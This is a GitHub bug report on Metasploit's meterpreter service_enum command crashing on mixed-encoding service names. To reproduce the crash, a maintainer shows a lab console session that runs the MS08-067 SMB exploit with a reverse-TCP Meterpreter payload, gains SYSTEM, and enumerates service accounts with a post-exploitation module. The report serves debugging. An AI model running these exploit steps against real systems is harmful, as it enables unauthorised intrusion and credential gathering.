Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Error running command service_enum: ArgumentError invalid byte sequence in UTF-8 #15833

Closed
friedrico opened this issue Nov 5, 2021 · 6 comments
Closed

Error running command service_enum: ArgumentError invalid byte sequence in UTF-8 #15833

friedrico opened this issue Nov 5, 2021 · 6 comments
Labels
ascii-utf8-issues bug confirmed Issues confirmed by a committer not-stale Label to stop an issue from being auto closed

Comments

@friedrico
Copy link
Contributor 

sysinfo 
Computer        : DESKTOP-...
OS              : Windows 10 (10.0 Build 19043).
Architecture    : x64
System Language : de_AT
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

load extapi
service_enum

[11/05/2021 16:01:31] [e(0)] meterpreter: Error running command service_enum: ArgumentError invalid byte sequence in UTF-8
[11/05/2021 16:01:31] [d(0)] meterpreter: Call stack:
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-text-0.2.37/lib/rex/text/wrapped_table.rb:225:in `block in sort_rows'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-text-0.2.37/lib/rex/text/wrapped_table.rb:220:in `sort!'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-text-0.2.37/lib/rex/text/wrapped_table.rb:220:in `sort_rows'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-text-0.2.37/lib/rex/text/wrapped_table.rb:120:in `to_s'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb:116:in `cmd_service_enum'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:557:in `run_command'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:102:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `run_single'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:64:in `block in interact'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:157:in `run'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:62:in `interact'
/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:555:in `_interact'
/usr/share/metasploit-framework/lib/rex/ui/interactive.rb:53:in `interact'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1543:in `cmd_sessions'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:557:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'

Framework: 6.1.11-dev
Ruby: ruby 2.7.4p191 (2021-07-07 revision a21a3b7d23) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql.
Install Method: Other - Please specify
@friedrico friedrico added the bug label Nov 5, 2021
@github-actions
Copy link

github-actions bot commented Dec 6, 2021

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot added the Stale Marks an issue as stale, to be closed if no action is taken label Dec 6, 2021
@bcoles
Copy link
Contributor

bcoles commented Dec 6, 2021

I haven't tested this but it seems likely that this is a bug. Adding not-stale until someone confirms.

@bcoles bcoles added not-stale Label to stop an issue from being auto closed and removed Stale Marks an issue as stale, to be closed if no action is taken labels Dec 6, 2021
@bcoles bcoles added the confirmed Issues confirmed by a committer label Jan 28, 2022
@bcoles
Copy link
Contributor

bcoles commented Jan 28, 2022

Confirmed.

msf6 > use exploit/windows/smb/ms08_067_netapi 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   6   Windows XP SP3 English (AlwaysOn NX)
   7   Windows XP SP3 English (NX)
   8   Windows XP SP2 Arabic (NX)
   9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
   10  Windows XP SP2 Chinese - Simplified (NX)
   11  Windows XP SP2 Chinese - Traditional (NX)
   12  Windows XP SP2 Czech (NX)
   13  Windows XP SP2 Danish (NX)
   14  Windows XP SP2 German (NX)
   15  Windows XP SP2 Greek (NX)
   16  Windows XP SP2 Spanish (NX)
   17  Windows XP SP2 Finnish (NX)
   18  Windows XP SP2 French (NX)
   19  Windows XP SP2 Hebrew (NX)
   20  Windows XP SP2 Hungarian (NX)
   21  Windows XP SP2 Italian (NX)
   22  Windows XP SP2 Japanese (NX)
   23  Windows XP SP2 Korean (NX)
   24  Windows XP SP2 Dutch (NX)
   25  Windows XP SP2 Norwegian (NX)
   26  Windows XP SP2 Polish (NX)
   27  Windows XP SP2 Portuguese - Brazilian (NX)
   28  Windows XP SP2 Portuguese (NX)
   29  Windows XP SP2 Russian (NX)
   30  Windows XP SP2 Swedish (NX)
   31  Windows XP SP2 Turkish (NX)
   32  Windows XP SP3 Arabic (NX)
   33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
   34  Windows XP SP3 Chinese - Simplified (NX)
   35  Windows XP SP3 Chinese - Traditional (NX)
   36  Windows XP SP3 Czech (NX)
   37  Windows XP SP3 Danish (NX)
   38  Windows XP SP3 German (NX)
   39  Windows XP SP3 Greek (NX)
   40  Windows XP SP3 Spanish (NX)
   41  Windows XP SP3 Finnish (NX)
   42  Windows XP SP3 French (NX)
   43  Windows XP SP3 Hebrew (NX)
   44  Windows XP SP3 Hungarian (NX)
   45  Windows XP SP3 Italian (NX)
   46  Windows XP SP3 Japanese (NX)
   47  Windows XP SP3 Korean (NX)
   48  Windows XP SP3 Dutch (NX)
   49  Windows XP SP3 Norwegian (NX)
   50  Windows XP SP3 Polish (NX)
   51  Windows XP SP3 Portuguese - Brazilian (NX)
   52  Windows XP SP3 Portuguese (NX)
   53  Windows XP SP3 Russian (NX)
   54  Windows XP SP3 Swedish (NX)
   55  Windows XP SP3 Turkish (NX)
   56  Windows 2003 SP1 English (NO NX)
   57  Windows 2003 SP1 English (NX)
   58  Windows 2003 SP1 Japanese (NO NX)
   59  Windows 2003 SP1 Spanish (NO NX)
   60  Windows 2003 SP1 Spanish (NX)
   61  Windows 2003 SP1 French (NO NX)
   62  Windows 2003 SP1 French (NX)
   63  Windows 2003 SP2 English (NO NX)
   64  Windows 2003 SP2 English (NX)
   65  Windows 2003 SP2 German (NO NX)
   66  Windows 2003 SP2 German (NX)
   67  Windows 2003 SP2 Portuguese (NX)
   68  Windows 2003 SP2 Portuguese - Brazilian (NX)
   69  Windows 2003 SP2 Spanish (NO NX)
   70  Windows 2003 SP2 Spanish (NX)
   71  Windows 2003 SP2 Japanese (NO NX)
   72  Windows 2003 SP2 French (NO NX)
   73  Windows 2003 SP2 French (NX)
   74  Windows 2003 SP2 Chinese - Simplified (NX)
   75  Windows 2003 SP2 Czech (NX)
   76  Windows 2003 SP2 Dutch (NX)
   77  Windows 2003 SP2 Hungarian (NX)
   78  Windows 2003 SP2 Italian (NX)
   79  Windows 2003 SP2 Russian (NX)
   80  Windows 2003 SP2 Swedish (NX)
   81  Windows 2003 SP2 Turkish (NX)


msf6 exploit(windows/smb/ms08_067_netapi) > set verbose true
verbose => true
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 172.16.191.194
rhosts => 172.16.191.194
msf6 exploit(windows/smb/ms08_067_netapi) > check

[*] 172.16.191.194:445 - Verifying vulnerable status... (path: 0x0000005a)
[+] 172.16.191.194:445 - The target is vulnerable.
msf6 exploit(windows/smb/ms08_067_netapi) > set payload 
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set target Windows\ 2003\ SP2\ Chinese\ -\ Simplified\ (NX) 
target => Windows 2003 SP2 Chinese - Simplified (NX)
msf6 exploit(windows/smb/ms08_067_netapi) > check

[*] 172.16.191.194:445 - Verifying vulnerable status... (path: 0x0000005a)
[+] 172.16.191.194:445 - The target is vulnerable.
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] 172.16.191.194:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 172.16.191.194
[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.194:1032 ) at 2022-01-28 02:23:15 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > service_enum
[-] The "service_enum" command requires the "extapi" extension to be loaded (run: `load extapi`)
meterpreter > load extapi
Loading extension extapi...Success.
meterpreter > service_enum

[-] Error running command service_enum: ArgumentError invalid byte sequence in UTF-8
meterpreter > 
Background session 1? [y/N]  
msf6 exploit(windows/smb/ms08_067_netapi) > tail -n 35 /root/.msf4/logs/framework.log
[*] exec: tail -n 35 /root/.msf4/logs/framework.log

[01/28/2022 02:23:14] [d(0)] core: SMB version(s) to negotiate: [1]
[01/28/2022 02:23:14] [d(0)] core: Negotiated SMB version: SMB1
[01/28/2022 02:23:15] [d(0)] core: HistoryManager.push_context name: :meterpreter
[01/28/2022 02:24:30] [e(0)] meterpreter: Error running command service_enum: ArgumentError invalid byte sequence in UTF-8
[01/28/2022 02:24:30] [d(0)] meterpreter: Call stack:
/var/lib/gems/2.7.0/gems/rex-text-0.2.37/lib/rex/text/wrapped_table.rb:225:in `block in sort_rows'
/var/lib/gems/2.7.0/gems/rex-text-0.2.37/lib/rex/text/wrapped_table.rb:220:in `sort!'
/var/lib/gems/2.7.0/gems/rex-text-0.2.37/lib/rex/text/wrapped_table.rb:220:in `sort_rows'
/var/lib/gems/2.7.0/gems/rex-text-0.2.37/lib/rex/text/wrapped_table.rb:120:in `to_s'
/root/Desktop/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb:116:in `cmd_service_enum'
/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:563:in `run_command'
/root/Desktop/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:102:in `run_command'
/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:512:in `block in run_single'
/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `each'
/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `run_single'
/root/Desktop/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:64:in `block in interact'
/root/Desktop/metasploit-framework/lib/rex/ui/text/shell.rb:157:in `run'
/root/Desktop/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:62:in `interact'
/root/Desktop/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:559:in `_interact'
/root/Desktop/metasploit-framework/lib/rex/ui/interactive.rb:53:in `interact'
/root/Desktop/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1591:in `cmd_sessions'
/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:563:in `run_command'
/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:512:in `block in run_single'
/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `each'
/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `run_single'
/root/Desktop/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:187:in `cmd_exploit'
/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:563:in `run_command'
/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:512:in `block in run_single'
/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `each'
/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `run_single'
/root/Desktop/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/root/Desktop/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/root/Desktop/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:23:in `<main>'
[01/28/2022 02:25:24] [d(0)] core: HistoryManager.pop_context name: :meterpreter
msf6 exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/enum_services 
msf6 post(windows/gather/enum_services) > set session 1
session => 1
msf6 post(windows/gather/enum_services) > set verbose true
verbose => true
msf6 post(windows/gather/enum_services) > run

[*] Listing Service Info for matching services, please wait...
[+] New service credential detected: AeLookupSvc is running as 'LocalSystem'
[+] New service credential detected: Alerter is running as 'NT AUTHORITY\LocalService'
[+] New service credential detected: Dhcp is running as 'NT AUTHORITY\NetworkService'
Services
========

 Name                                 Credentials                  Command   Startup
 ----                                 -----------                  -------   -------
 ALG                                  NT AUTHORITY\LocalService    Manual    C:\WINDOWS\System32\alg.exe
 AeLookupSvc                          LocalSystem                  Auto      C:\WINDOWS\system32\svchost.exe -k netsvcs
 Alerter                              NT AUTHORITY\LocalService    Disabled  C:\WINDOWS\system32\svchost.exe -k LocalService
 AppMgmt                              LocalSystem                  Manual    C:\WINDOWS\system32\svchost.exe -k netsvcs
 AudioSrv                             LocalSystem                  Disabled  C:\WINDOWS\System32\svchost.exe -k netsvcs
 BITS                                 LocalSystem                  Manual    C:\WINDOWS\system32\svchost.exe -k netsvcs
 Browser                              LocalSystem                  Auto      C:\WINDOWS\system32\svchost.exe -k netsvcs
 COMSysApp                            LocalSystem                  Manual    C:\WINDOWS\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
 CiSvc                                LocalSystem                  Disabled  C:\WINDOWS\system32\cisvc.exe
 ClipSrv                              LocalSystem                  Disabled  C:\WINDOWS\system32\clipsrv.exe
 CryptSvc                             LocalSystem                  Auto      C:\WINDOWS\system32\svchost.exe -k netsvcs
 DcomLaunch                           LocalSystem                  Auto      C:\WINDOWS\system32\svchost.exe -k DcomLaunch
 Dfs                                  LocalSystem                  Manual    C:\WINDOWS\system32\Dfssvc.exe
 Dhcp                                 NT AUTHORITY\NetworkService  Auto      C:\WINDOWS\system32\svchost.exe -k NetworkService
 Dnscache                             NT AUTHORITY\NetworkService  Auto      C:\WINDOWS\system32\svchost.exe -k NetworkService
 ERSvc                                LocalSystem                  Auto      C:\WINDOWS\System32\svchost.exe -k WinErr
 EventSystem                          LocalSystem                  Auto      C:\WINDOWS\system32\svchost.exe -k netsvcs
 Eventlog                             LocalSystem                  Auto      C:\WINDOWS\system32\services.exe
 HTTPFilter                           LocalSystem                  Manual    C:\WINDOWS\System32\lsass.exe
 HidServ                              LocalSystem                  Disabled  C:\WINDOWS\System32\svchost.exe -k netsvcs
 ImapiService                         LocalSystem                  Disabled  C:\WINDOWS\system32\imapi.exe
 IsmServ                              LocalSystem                  Disabled  C:\WINDOWS\System32\ismserv.exe
 LicenseService                       NT AUTHORITY\NetworkService  Disabled  C:\WINDOWS\System32\llssrv.exe
 LmHosts                              NT AUTHORITY\LocalService    Auto      C:\WINDOWS\system32\svchost.exe -k LocalService
 MSDTC                                NT AUTHORITY\NetworkService  Auto      C:\WINDOWS\system32\msdtc.exe
 MSIServer                            LocalSystem                  Manual    C:\WINDOWS\system32\msiexec.exe /V
 Messenger                            LocalSystem                  Disabled  C:\WINDOWS\system32\svchost.exe -k netsvcs
 NetDDE                               LocalSystem                  Disabled  C:\WINDOWS\system32\netdde.exe
 NetDDEdsdm                           LocalSystem                  Disabled  C:\WINDOWS\system32\netdde.exe
 Netlogon                             LocalSystem                  Manual    C:\WINDOWS\system32\lsass.exe
 Netman                               LocalSystem                  Manual    C:\WINDOWS\System32\svchost.exe -k netsvcs
 Nla                                  LocalSystem                  Manual    C:\WINDOWS\system32\svchost.exe -k netsvcs
 NtFrs                                LocalSystem                  Manual    C:\WINDOWS\system32\ntfrs.exe
 NtLmSsp                              LocalSystem                  Manual    C:\WINDOWS\system32\lsass.exe
 NtmsSvc                              LocalSystem                  Manual    C:\WINDOWS\system32\svchost.exe -k netsvcs
 PlugPlay                             LocalSystem                  Auto      C:\WINDOWS\system32\services.exe
 PolicyAgent                          LocalSystem                  Auto      C:\WINDOWS\system32\lsass.exe
 ProtectedStorage                     LocalSystem                  Auto      C:\WINDOWS\system32\lsass.exe
 RDSessMgr                            LocalSystem                  Manual    C:\WINDOWS\system32\sessmgr.exe
 RSoPProv                             LocalSystem                  Manual    C:\WINDOWS\system32\RSoPProv.exe
 RasAuto                              LocalSystem                  Manual    C:\WINDOWS\system32\svchost.exe -k netsvcs
 RasMan                               LocalSystem                  Manual    C:\WINDOWS\system32\svchost.exe -k netsvcs
 RemoteAccess                         LocalSystem                  Auto      C:\WINDOWS\system32\svchost.exe -k netsvcs
 RemoteRegistry                       NT AUTHORITY\LocalService    Auto      C:\WINDOWS\system32\svchost.exe -k regsvc
 RpcLocator                           NT AUTHORITY\NetworkService  Manual    C:\WINDOWS\system32\locator.exe
 RpcSs                                NT AUTHORITY\NetworkService  Auto      C:\WINDOWS\system32\svchost.exe -k rpcss
 SCardSvr                             NT AUTHORITY\LocalService    Manual    C:\WINDOWS\System32\SCardSvr.exe
 SENS                                 LocalSystem                  Auto      C:\WINDOWS\system32\svchost.exe -k netsvcs
 SamSs                                LocalSystem                  Auto      C:\WINDOWS\system32\lsass.exe
 Schedule                             LocalSystem                  Auto      C:\WINDOWS\System32\svchost.exe -k netsvcs
 SharedAccess                         LocalSystem                  Auto      C:\WINDOWS\system32\svchost.exe -k netsvcs
 ShellHWDetection                     LocalSystem                  Auto      C:\WINDOWS\System32\svchost.exe -k netsvcs
 Spooler                              LocalSystem                  Auto      C:\WINDOWS\system32\spoolsv.exe
 SysmonLog                            NT Authority\NetworkService  Auto      C:\WINDOWS\system32\smlogsvc.exe
 TPAutoConnSvc                        LocalSystem                  Manual    "C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe"
 TPVCGateway                          LocalSystem                  Manual    "C:\Program Files\VMware\VMware Tools\TPVCGateway.exe"
 TapiSrv                              LocalSystem                  Manual    C:\WINDOWS\System32\svchost.exe -k tapisrv
 TermService                          LocalSystem                  Manual    C:\WINDOWS\System32\svchost.exe -k termsvcs
 Themes                               LocalSystem                  Disabled  C:\WINDOWS\System32\svchost.exe -k netsvcs
 TlntSvr                              NT AUTHORITY\LocalService    Disabled  C:\WINDOWS\system32\tlntsvr.exe
 TrkSvr                               LocalSystem                  Disabled  C:\WINDOWS\system32\svchost.exe -k netsvcs
 TrkWks                               LocalSystem                  Auto      C:\WINDOWS\system32\svchost.exe -k netsvcs
 Tssdis                               LocalSystem                  Disabled  C:\WINDOWS\System32\tssdis.exe
 UMWdf                                NT AUTHORITY\LocalService    Manual    C:\WINDOWS\system32\wdfmgr.exe
 UPS                                  NT AUTHORITY\LocalService    Manual    C:\WINDOWS\System32\ups.exe
 VGAuthService                        LocalSystem                  Auto      "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
 VMTools                              LocalSystem                  Auto      "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
 VMware Physical Disk Helper Service  LocalSystem                  Auto      "C:\Program Files\VMware\VMware Tools\vmacthlp.exe"
 VSS                                  LocalSystem                  Manual    C:\WINDOWS\System32\vssvc.exe
 W32Time                              NT AUTHORITY\LocalService    Auto      C:\WINDOWS\System32\svchost.exe -k LocalService
 WZCSVC                               LocalSystem                  Auto      C:\WINDOWS\System32\svchost.exe -k netsvcs
 WebClient                            NT AUTHORITY\LocalService    Disabled  C:\WINDOWS\system32\svchost.exe -k LocalService
 WinHttpAutoProxySvc                  NT AUTHORITY\LocalService    Manual    C:\WINDOWS\system32\svchost.exe -k LocalService
 WmdmPmSN                             LocalSystem                  Manual    C:\WINDOWS\System32\svchost.exe -k netsvcs
 Wmi                                  LocalSystem                  Manual    C:\WINDOWS\System32\svchost.exe -k netsvcs
 WmiApSrv                             LocalSystem                  Manual    C:\WINDOWS\system32\wbem\wmiapsrv.exe
 dmadmin                              LocalSystem                  Manual    C:\WINDOWS\System32\dmadmin.exe /com
 dmserver                             LocalSystem                  Auto      C:\WINDOWS\System32\svchost.exe -k netsvcs
 helpsvc                              LocalSystem                  Auto      C:\WINDOWS\System32\svchost.exe -k netsvcs
 kdc                                  LocalSystem                  Disabled  C:\WINDOWS\System32\lsass.exe
 lanmanserver                         LocalSystem                  Auto      C:\WINDOWS\system32\svchost.exe -k netsvcs
 lanmanworkstation                    LocalSystem                  Auto      C:\WINDOWS\system32\svchost.exe -k netsvcs
 mnmsrvc                              LocalSystem                  Disabled  C:\WINDOWS\system32\mnmsrvc.exe
 sacsvr                               LocalSystem                  Manual    C:\WINDOWS\System32\svchost.exe -k netsvcs
 seclogon                             LocalSystem                  Auto      C:\WINDOWS\System32\svchost.exe -k netsvcs
 stisvc                               NT AUTHORITY\LocalService    Disabled  C:\WINDOWS\system32\svchost.exe -k imgsvc
 swprv                                LocalSystem                  Manual    C:\WINDOWS\System32\svchost.exe -k swprv
 vds                                  LocalSystem                  Manual    C:\WINDOWS\System32\vds.exe
 vmvss                                LocalSystem                  Manual    C:\WINDOWS\system32\dllhost.exe /Processid:{1753CD50-DF0B-4B2E-8191-EE4B12A27DF3}
 winmgmt                              LocalSystem                  Auto      C:\WINDOWS\system32\svchost.exe -k netsvcs
 wuauserv                             LocalSystem                  Auto      C:\WINDOWS\system32\svchost.exe -k netsvcs
 xmlprov                              LocalSystem                  Manual    C:\WINDOWS\System32\svchost.exe -k netsvcs

[+] Loot file stored in: /root/.msf4/loot/20220128022613_default_172.16.191.194_windows.services_310607.txt
[*] Post module execution completed
msf6 post(windows/gather/enum_services) >

@bcoles
Copy link
Contributor

bcoles commented Jan 28, 2022

On my test system the UTF-8 issue was caused by this service:

["612", "Running", "N", "vmware physical disk helper service (VMware \xCE\xEF\xC0\xED\xB4\xC5\xC5\xCC\xD6\xFA\xCA\u05B7\xFE\xCE\xF1)"]

For whatever reason, the string contains mixed encodings.

This string eventually makes its way to Rex::Text::WrappedTable which burst into flames in sort_rows and chunk_values (and likely a whole bunch of other places). This library has a history of UTF-8 issues:

This issue could be patched in cmd_service_enum but there are likely many other areas where passing to Rex::Text::WrappedTable causes issues, such as:

See also:

#15302 (comment)

@adfoster-r7 adfoster-r7 mentioned this issue Jun 25, 2022
Merged
@adfoster-r7
Copy link
Contributor

The crash should be fixed in the next release by #16729

I believe the underlying issue may be caused by Metepreter may be dropping bytes still; but I haven't replicated the specific scenario provided by bcoles

@gwillcox-r7
Copy link
Contributor

Closing issue as release has now gone out. If still an issue feel free to open this up again.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
ascii-utf8-issues bug confirmed Issues confirmed by a committer not-stale Label to stop an issue from being auto closed
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@bcoles @friedrico @adfoster-r7 @gwillcox-r7